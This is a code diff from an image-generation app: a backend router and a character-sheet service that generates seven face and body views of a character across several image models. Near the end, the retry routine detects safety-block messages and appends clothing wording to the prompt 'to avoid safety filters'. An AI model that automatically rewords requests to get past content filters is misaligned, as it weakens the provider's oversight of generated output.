            return LongCatEditClient.ASPECT_RATIOS

        elif backend in (BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO):
            from .gemini_client import GeminiClient
            return GeminiClient.ASPECT_RATIOS

        elif backend == BackendType.QWEN_IMAGE_EDIT:
            from .qwen_image_edit_client import QwenImageEditClient
            return QwenImageEditClient.ASPECT_RATIOS

        elif backend == BackendType.QWEN_COMFYUI:
            from .comfyui_client import ComfyUIClient
            return ComfyUIClient.ASPECT_RATIOS

        else:
            # Default fallback
            return {
                "1:1": (1024, 1024),
                "16:9": (1344, 768),
                "9:16": (768, 1344),
            }

    @staticmethod
    def get_aspect_ratio_choices(backend: BackendType) -> list:
        """
        Get aspect ratio choices for UI dropdowns.

        Returns list of (label, value) tuples.
        """
        ratios = BackendRouter.get_supported_aspect_ratios(backend)
        choices = []
        for ratio, (w, h) in ratios.items():
            label = f"{ratio} ({w}x{h})"
            choices.append((label, ratio))
        return choices

    def get_available_backends(self) -> list:
        """Get list of available backends (API key set / dependencies importable)."""
        available = []

        # Gemini backends require API key
        if self.gemini_api_key:
            available.extend([BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO])

        # Local backends always available (if dependencies installed)
        try:
            from diffusers import Flux2KleinPipeline
            available.append(BackendType.FLUX_KLEIN)
            # FIX: both klein variants are served by the same pipeline class
            # (see _create_client), so the 9B backend is available whenever
            # the 4B one is; previously it was never reported here.
            available.append(BackendType.FLUX_KLEIN_9B_FP8)
        except ImportError:
            pass

        try:
            from diffusers import ZImagePipeline
            available.append(BackendType.ZIMAGE_TURBO)
            available.append(BackendType.ZIMAGE_BASE)
        except ImportError:
            pass

        try:
            from diffusers import LongCatImageEditPipeline
            available.append(BackendType.LONGCAT_EDIT)
        except ImportError:
            pass

        try:
            from diffusers import QwenImageEditPlusPipeline
            available.append(BackendType.QWEN_IMAGE_EDIT)
        except ImportError:
            pass

        # ComfyUI backend - check if ComfyUI client works
        try:
            from .comfyui_client import ComfyUIClient
            client = ComfyUIClient()
            if client.is_healthy():
                available.append(BackendType.QWEN_COMFYUI)
        except Exception:
            pass

        return available

    @staticmethod
    def get_backend_choices() -> list:
        """Get list of (label, value) backend choices for UI dropdowns."""
        return [
            ("Gemini Flash (Cloud)", BackendType.GEMINI_FLASH.value),
            ("Gemini Pro (Cloud)", BackendType.GEMINI_PRO.value),
            ("FLUX.2 klein 4B (Local)", BackendType.FLUX_KLEIN.value),
            # FIX: the 9B backend existed in BackendType/BACKEND_NAMES (and is
            # the app's default) but was missing from the choices list.
            ("FLUX.2 klein 9B-FP8 (Local, Best Quality)", BackendType.FLUX_KLEIN_9B_FP8.value),
            ("Z-Image Turbo 6B (Fast, 9 steps, 16GB)", BackendType.ZIMAGE_TURBO.value),
            ("Z-Image Base 6B (Quality, 50 steps, CFG)", BackendType.ZIMAGE_BASE.value),
            ("LongCat-Image-Edit (Instruction Editing, 18GB)", BackendType.LONGCAT_EDIT.value),
            ("Qwen-Image-Edit-2511 (Local, High VRAM)", BackendType.QWEN_IMAGE_EDIT.value),
            ("Qwen-Image-Edit-2511-FP8 (ComfyUI)", BackendType.QWEN_COMFYUI.value),
        ]

    @staticmethod
    def backend_from_string(value: str) -> BackendType:
        """Convert a backend value string to its BackendType member.

        Raises:
            ValueError: if no member has that value.
        """
        for bt in BackendType:
            if bt.value == value:
                return bt
        raise ValueError(f"Unknown backend: {value}")
|
src/character_service.py
ADDED
|
@@ -0,0 +1,709 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Service
|
| 3 |
+
=======================
|
| 4 |
+
|
| 5 |
+
9-stage pipeline for generating 7-view character turnaround sheets.
|
| 6 |
+
|
| 7 |
+
Layout:
|
| 8 |
+
+------------------+------------------+------------------+
|
| 9 |
+
| Left Face Profile| Front Face | Right Face Profile| (3:4)
|
| 10 |
+
+------------------+------------------+------------------+
|
| 11 |
+
| Left Side Body | Front Body | Right Side Body | Back Body | (9:16)
|
| 12 |
+
+------------------+------------------+------------------+
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import time
|
| 16 |
+
import random
|
| 17 |
+
import logging
|
| 18 |
+
from pathlib import Path
|
| 19 |
+
from typing import Optional, Tuple, Dict, Any, Callable, List
|
| 20 |
+
from datetime import datetime
|
| 21 |
+
from PIL import Image
|
| 22 |
+
|
| 23 |
+
from .models import (
|
| 24 |
+
GenerationRequest,
|
| 25 |
+
GenerationResult,
|
| 26 |
+
CharacterSheetConfig,
|
| 27 |
+
CharacterSheetMetadata
|
| 28 |
+
)
|
| 29 |
+
from .gemini_client import GeminiClient
|
| 30 |
+
from .backend_router import BackendRouter, BackendType
|
| 31 |
+
from .utils import ensure_pil_image, save_image, sanitize_filename, preprocess_images_for_backend
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
logger = logging.getLogger(__name__)
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
class CharacterSheetService:
|
| 38 |
+
"""
|
| 39 |
+
Service for generating 7-view character turnaround sheets.
|
| 40 |
+
|
| 41 |
+
Pipeline (9 stages):
|
| 42 |
+
0. Input normalization (face→body or body→face+body)
|
| 43 |
+
1. Front face portrait
|
| 44 |
+
2. Left face profile (90 degrees)
|
| 45 |
+
3. Right face profile (90 degrees)
|
| 46 |
+
4. Front full body (from normalized)
|
| 47 |
+
5. Back full body
|
| 48 |
+
6. Left side full body
|
| 49 |
+
7. Right side full body
|
| 50 |
+
8. Composite character sheet
|
| 51 |
+
"""
|
| 52 |
+
|
| 53 |
+
def __init__(
|
| 54 |
+
self,
|
| 55 |
+
api_key: Optional[str] = None,
|
| 56 |
+
use_pro_model: bool = False,
|
| 57 |
+
config: Optional[CharacterSheetConfig] = None,
|
| 58 |
+
backend: Optional[BackendType] = None,
|
| 59 |
+
backend_router: Optional[BackendRouter] = None
|
| 60 |
+
):
|
| 61 |
+
"""
|
| 62 |
+
Initialize character sheet service.
|
| 63 |
+
|
| 64 |
+
Args:
|
| 65 |
+
api_key: Gemini API key (for cloud backends)
|
| 66 |
+
use_pro_model: Use Gemini Pro model (legacy, use backend param instead)
|
| 67 |
+
config: Optional configuration
|
| 68 |
+
backend: Specific backend to use
|
| 69 |
+
backend_router: Pre-configured backend router
|
| 70 |
+
"""
|
| 71 |
+
self.config = config or CharacterSheetConfig()
|
| 72 |
+
|
| 73 |
+
# Determine backend
|
| 74 |
+
if backend_router is not None:
|
| 75 |
+
self.router = backend_router
|
| 76 |
+
self.backend = backend or backend_router.default_backend
|
| 77 |
+
else:
|
| 78 |
+
# Determine default backend based on params
|
| 79 |
+
if backend is not None:
|
| 80 |
+
self.backend = backend
|
| 81 |
+
elif use_pro_model:
|
| 82 |
+
self.backend = BackendType.GEMINI_PRO
|
| 83 |
+
else:
|
| 84 |
+
self.backend = BackendType.GEMINI_FLASH
|
| 85 |
+
|
| 86 |
+
self.router = BackendRouter(
|
| 87 |
+
gemini_api_key=api_key,
|
| 88 |
+
default_backend=self.backend
|
| 89 |
+
)
|
| 90 |
+
|
| 91 |
+
# For backward compatibility
|
| 92 |
+
self.use_pro_model = use_pro_model
|
| 93 |
+
self.client = self.router.get_client(self.backend)
|
| 94 |
+
|
| 95 |
+
logger.info(f"CharacterSheetService initialized (backend: {self.backend.value})")
|
| 96 |
+
|
| 97 |
+
    def generate_character_sheet(
        self,
        initial_image: Optional[Image.Image],
        input_type: str = "Face Only",
        character_name: str = "Character",
        gender_term: str = "character",
        costume_description: str = "",
        costume_image: Optional[Image.Image] = None,
        face_image: Optional[Image.Image] = None,
        body_image: Optional[Image.Image] = None,
        include_costume_in_faces: bool = True,
        progress_callback: Optional[Callable[[int, int, str], None]] = None,
        stage_callback: Optional[Callable[[str, Image.Image, Dict[str, Any]], None]] = None,
        output_dir: Optional[Path] = None
    ) -> Tuple[Optional[Image.Image], str, Dict[str, Any]]:
        """
        Generate complete 7-view character turnaround sheet.

        Runs the 9-stage pipeline: input normalization, 3 face portraits,
        4 body views, then a final composite. Any stage failure aborts the
        pipeline and returns (None, error_message, {}).

        Args:
            initial_image: Starting image (face or body)
            input_type: "Face Only", "Full Body", or "Face + Body (Separate)"
            character_name: Character name
            gender_term: "character", "man", or "woman"
            costume_description: Text costume description
            costume_image: Optional costume reference
            face_image: Face image (for Face + Body mode)
            body_image: Body image (for Face + Body mode)
            include_costume_in_faces: If True, include costume reference in face views.
                Set False for models like FLUX that confuse costume with framing.
            progress_callback: Optional callback(stage, total_stages, message)
            stage_callback: Optional callback(stage_name, image, stages_dict) called after each
                stage completes with the generated image. Enables streaming preview.
            output_dir: Optional output directory

        Returns:
            Tuple of (character_sheet, status_message, metadata)
        """
        try:
            total_stages = 9
            stages = {}  # stage_name -> PIL.Image, shared with stage_callback

            logger.info("=" * 60)
            logger.info(f"STARTING CHARACTER SHEET: {character_name}")
            logger.info(f"Input type: {input_type}")
            logger.info(f"Costume: {costume_description or '(none)'}")
            logger.info("=" * 60)

            # Build costume instructions - separate for face and body views
            # For models like FLUX, costume refs confuse face generation
            costume_instruction_body = ""
            if costume_description:
                costume_instruction_body = f" wearing {costume_description}"
            elif costume_image:
                costume_instruction_body = " wearing the costume shown in the reference"

            # Face views only get costume instruction if flag is set
            if include_costume_in_faces:
                costume_instruction_face = costume_instruction_body
            else:
                costume_instruction_face = ""
                logger.info("Costume excluded from face views (include_costume_in_faces=False)")

            def update_progress(stage: int, message: str):
                # Forward progress to the caller (if any) and always log it.
                if progress_callback:
                    progress_callback(stage, total_stages, message)
                logger.info(f"[Stage {stage}/{total_stages}] {message}")

            def notify_stage_complete(stage_name: str, image: Image.Image):
                """Notify callback when a stage completes for streaming preview."""
                if stage_callback and image is not None:
                    stage_callback(stage_name, image, stages)

            # =================================================================
            # Stage 0: Normalize input
            # =================================================================
            update_progress(0, "Normalizing input images...")

            reference_body, reference_face = self._normalize_input(
                initial_image=initial_image,
                input_type=input_type,
                face_image=face_image,
                body_image=body_image,
                costume_instruction=costume_instruction_body,  # Body normalization uses full costume
                costume_image=costume_image,
                gender_term=gender_term,
                stages=stages,
                progress_callback=lambda msg: update_progress(0, msg)
            )

            if reference_body is None or reference_face is None:
                return None, "Failed to normalize input images", {}

            # Brief pause between stages — presumably backend/API pacing; confirm.
            time.sleep(1)

            # =================================================================
            # FACE VIEWS (3 portraits)
            # =================================================================

            # Stage 1: Front face portrait
            update_progress(1, "Generating front face portrait...")

            if input_type == "Face + Body (Separate)":
                prompt = f"Generate a close-up frontal facial portrait showing the {gender_term} from the first image (body/costume reference), extrapolate and extract exact facial details from the second image (face reference). Do NOT transfer clothing or hair style from the second image. The face should fill the entire vertical space, neutral grey background with professional studio lighting."
                input_images = [reference_body, reference_face]
            else:
                prompt = f"Generate a formal portrait view of this {gender_term}{costume_instruction_face} as depicted in the reference images, in front of a neutral grey background with professional studio lighting. The face should fill the entire vertical space. Maintain exact facial features from the reference."
                input_images = [reference_face, reference_body]
                # Only include costume in face views if flag is set (smarter models)
                if costume_image and include_costume_in_faces:
                    input_images.append(costume_image)

            front_face, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.face_aspect_ratio,
                temperature=self.config.face_temperature
            )

            if front_face is None:
                return None, f"Stage 1 failed: {status}", {}

            stages['front_face'] = front_face
            notify_stage_complete('front_face', front_face)
            time.sleep(1)

            # Stage 2: Left face profile
            update_progress(2, "Generating left face profile...")

            prompt = f"Create a left side profile view (90 degrees) of this {gender_term}'s face{costume_instruction_face}, showing the left side of the face filling the frame. Professional studio lighting against a neutral grey background. Maintain exact facial features from the reference."

            input_images = [front_face, reference_body]
            if input_type == "Face + Body (Separate)":
                input_images.append(reference_face)
            elif costume_image and include_costume_in_faces:
                # Only include costume in face views if flag is set (smarter models)
                input_images.append(costume_image)

            left_face, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.face_aspect_ratio,
                temperature=self.config.face_temperature
            )

            if left_face is None:
                return None, f"Stage 2 failed: {status}", {}

            stages['left_face'] = left_face
            notify_stage_complete('left_face', left_face)
            time.sleep(1)

            # Stage 3: Right face profile
            update_progress(3, "Generating right face profile...")

            prompt = f"Create a right side profile view (90 degrees) of this {gender_term}'s face{costume_instruction_face}, showing the right side of the face filling the frame. Professional studio lighting against a neutral grey background. Maintain exact facial features from the reference."

            input_images = [front_face, reference_body]
            if input_type == "Face + Body (Separate)":
                input_images.append(reference_face)
            elif costume_image and include_costume_in_faces:
                # Only include costume in face views if flag is set (smarter models)
                input_images.append(costume_image)

            right_face, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.face_aspect_ratio,
                temperature=self.config.face_temperature
            )

            if right_face is None:
                return None, f"Stage 3 failed: {status}", {}

            stages['right_face'] = right_face
            notify_stage_complete('right_face', right_face)
            time.sleep(1)

            # =================================================================
            # BODY VIEWS (4 views)
            # =================================================================

            # Stage 4: Front body (use normalized reference)
            # No generation here: the normalized Stage-0 body IS the front view.
            update_progress(4, "Using front body from normalized reference...")
            front_body = reference_body
            stages['front_body'] = front_body
            notify_stage_complete('front_body', front_body)
            time.sleep(1)

            # Stage 5: Back body
            update_progress(5, "Generating back full body...")

            prompt = f"Generate a rear view image of this {gender_term}{costume_instruction_body} showing the back in a neutral standing pose against a neutral grey background with professional studio lighting. The full body should fill the vertical space. Maintain consistent appearance from the reference images."

            input_images = [reference_body, front_face]
            if costume_image:
                input_images.append(costume_image)

            back_body, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.body_temperature
            )

            if back_body is None:
                return None, f"Stage 5 failed: {status}", {}

            stages['back_body'] = back_body
            notify_stage_complete('back_body', back_body)
            time.sleep(1)

            # Stage 6: Left side body
            update_progress(6, "Generating left side full body...")

            prompt = f"Generate a left side view of the full body of this {gender_term}{costume_instruction_body} in front of a neutral grey background. The {gender_term} should be shown from the left side (90 degree angle) in a neutral standing pose. Full body fills vertical space. Professional studio lighting."

            # The matching face profile leads the reference list for this side.
            input_images = [left_face, front_body, reference_body]

            left_body, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.body_temperature
            )

            if left_body is None:
                return None, f"Stage 6 failed: {status}", {}

            stages['left_body'] = left_body
            notify_stage_complete('left_body', left_body)
            time.sleep(1)

            # Stage 7: Right side body
            update_progress(7, "Generating right side full body...")

            prompt = f"Generate a right side view of the full body of this {gender_term}{costume_instruction_body} in front of a neutral grey background. The {gender_term} should be shown from the right side (90 degree angle) in a neutral standing pose. Full body fills vertical space. Professional studio lighting."

            input_images = [right_face, front_body, reference_body]

            right_body, status = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.body_temperature
            )

            if right_body is None:
                return None, f"Stage 7 failed: {status}", {}

            stages['right_body'] = right_body
            notify_stage_complete('right_body', right_body)
            time.sleep(1)

            # =================================================================
            # Stage 8: Composite character sheet
            # =================================================================
            update_progress(8, "Compositing character sheet...")

            character_sheet = self.composite_character_sheet(
                left_face=left_face,
                front_face=front_face,
                right_face=right_face,
                left_body=left_body,
                front_body=front_body,
                right_body=right_body,
                back_body=back_body
            )

            stages['character_sheet'] = character_sheet

            # Build metadata
            metadata = CharacterSheetMetadata(
                character_name=character_name,
                input_type=input_type,
                costume_description=costume_description,
                backend=self.router.get_active_backend_name(),
                stages={
                    "left_face": {"size": left_face.size},
                    "front_face": {"size": front_face.size},
                    "right_face": {"size": right_face.size},
                    "left_body": {"size": left_body.size},
                    "front_body": {"size": front_body.size},
                    "right_body": {"size": right_body.size},
                    "back_body": {"size": back_body.size},
                }
            )

            success_msg = f"Character sheet generated! 7 views of {character_name}"

            # Save to disk if requested
            if output_dir:
                save_dir = self._save_outputs(
                    character_name=character_name,
                    stages=stages,
                    output_dir=output_dir
                )
                success_msg += f"\nSaved to: {save_dir}"

            update_progress(9, "Complete!")
            return character_sheet, success_msg, {"metadata": metadata, "stages": stages}

        except Exception as e:
            # Any unexpected failure is reported to the caller as a status string.
            logger.exception(f"Character sheet generation failed: {e}")
            return None, f"Error: {str(e)}", {}
|
| 401 |
+
|
| 402 |
+
    def _normalize_input(
        self,
        initial_image: Optional[Image.Image],
        input_type: str,
        face_image: Optional[Image.Image],
        body_image: Optional[Image.Image],
        costume_instruction: str,
        costume_image: Optional[Image.Image],
        gender_term: str,
        stages: dict,
        progress_callback: Optional[Callable]
    ) -> Tuple[Optional[Image.Image], Optional[Image.Image]]:
        """Normalize input images to create reference body and face.

        Depending on `input_type`:
          - "Face + Body (Separate)": normalize the body image; the given
            face image is used as-is.
          - "Face Only": generate a full body from the face image.
          - otherwise ("Full Body"): normalize the body, then generate a
            face close-up from it.

        Intermediate images are recorded into `stages` (mutated in place).

        Returns:
            (reference_body, reference_face), or (None, None) on any failure
            or missing required input.
        """

        if input_type == "Face + Body (Separate)":
            # Both images are required in this mode.
            if face_image is None or body_image is None:
                return None, None

            if progress_callback:
                progress_callback("Normalizing body image...")

            prompt = f"Front view full body portrait of this person{costume_instruction}, standing, neutral background"
            input_images = [body_image, face_image]
            if costume_image:
                input_images.append(costume_image)

            normalized_body, _ = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.normalize_temperature
            )

            if normalized_body is None:
                return None, None

            stages['normalized_body'] = normalized_body
            # The caller's face image is already a usable face reference.
            return normalized_body, face_image

        elif input_type == "Face Only":
            if initial_image is None:
                return None, None

            if progress_callback:
                progress_callback("Generating full body from face...")

            prompt = f"Create a full body image of the {gender_term}{costume_instruction} standing in a neutral pose in front of a grey background with professional studio lighting. The {gender_term}'s face and features should match the reference image exactly."

            input_images = [initial_image]
            if costume_image:
                input_images.append(costume_image)

            full_body, _ = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.normalize_temperature
            )

            if full_body is None:
                return None, None

            stages['generated_body'] = full_body
            # The original input serves directly as the face reference.
            return full_body, initial_image

        else:  # Full Body
            if initial_image is None:
                return None, None

            # Normalize body
            if progress_callback:
                progress_callback("Normalizing full body...")

            prompt = f"Front view full body portrait of this person{costume_instruction}, standing, neutral background"

            input_images = [initial_image]
            if costume_image:
                input_images.append(costume_image)

            normalized_body, _ = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.body_aspect_ratio,
                temperature=self.config.normalize_temperature
            )

            if normalized_body is None:
                return None, None

            stages['normalized_body'] = normalized_body
            # Brief pause before the second generation call — presumably
            # API pacing; confirm against backend rate limits.
            time.sleep(1)

            # Extract face
            if progress_callback:
                progress_callback("Generating face closeup...")

            prompt = f"Create a frontal closeup portrait of this {gender_term}'s face{costume_instruction}, focusing only on the face and head. Professional studio lighting against a neutral grey background. The face should fill the entire vertical space. Maintain exact facial features from the reference."

            input_images = [normalized_body, initial_image]
            if costume_image:
                input_images.append(costume_image)

            face_closeup, _ = self._generate_stage(
                prompt=prompt,
                input_images=input_images,
                aspect_ratio=self.config.face_aspect_ratio,
                temperature=self.config.face_temperature
            )

            if face_closeup is None:
                return None, None

            stages['extracted_face'] = face_closeup
            return normalized_body, face_closeup
|
| 516 |
+
|
| 517 |
+
    def _generate_stage(
        self,
        prompt: str,
        input_images: List[Image.Image],
        aspect_ratio: str,
        temperature: float,
        max_retries: int = 3
    ) -> Tuple[Optional[Image.Image], str]:
        """Generate single stage with retry logic.

        Preprocesses the reference images for the active backend, then calls
        the backend up to `max_retries` times. If a failure message looks like
        a safety block, the prompt is softened once (clothing wording added)
        before the next attempt.

        Args:
            prompt: Generation instruction for this stage.
            input_images: Reference images passed to the backend.
            aspect_ratio: Target aspect ratio (backend-specific string).
            temperature: Sampling temperature for the backend.
            max_retries: Maximum number of attempts.

        Returns:
            (image, message) on success; (None, error_message) if all
            attempts fail.
        """

        modified_prompt = prompt
        cfg = self.config

        # Preprocess images for the current backend
        backend_type = self.backend.value if self.backend else "unknown"
        processed_images = preprocess_images_for_backend(
            input_images, backend_type, aspect_ratio
        )
        logger.info(f"Preprocessed {len(processed_images)} images for {backend_type}")

        for attempt in range(max_retries):
            try:
                if attempt > 0:
                    # Fixed (non-exponential) back-off between retries.
                    wait_time = cfg.retry_delay
                    logger.info(f"Retry {attempt + 1}/{max_retries}, waiting {wait_time}s...")
                    time.sleep(wait_time)

                request = GenerationRequest(
                    prompt=modified_prompt,
                    input_images=processed_images,
                    aspect_ratio=aspect_ratio,
                    temperature=temperature
                )

                result = self.client.generate(request)

                if result.success:
                    # Random pause to stay under backend rate limits.
                    delay = random.uniform(cfg.rate_limit_delay_min, cfg.rate_limit_delay_max)
                    time.sleep(delay)
                    return result.image, result.message

                # Check for safety block
                error_upper = result.message.upper()
                if any(kw in error_upper for kw in ['SAFETY', 'BLOCKED', 'PROHIBITED', 'IMAGE_OTHER']):
                    # Only soften prompts that don't already mention clothing
                    # (costume instructions insert "wearing ...").
                    if 'wearing' not in modified_prompt.lower():
                        if 'body' in modified_prompt.lower():
                            modified_prompt = prompt + ", fully clothed in casual wear"
                        else:
                            modified_prompt = prompt + ", wearing appropriate clothing"
                        logger.info("Modified prompt to avoid safety filters")

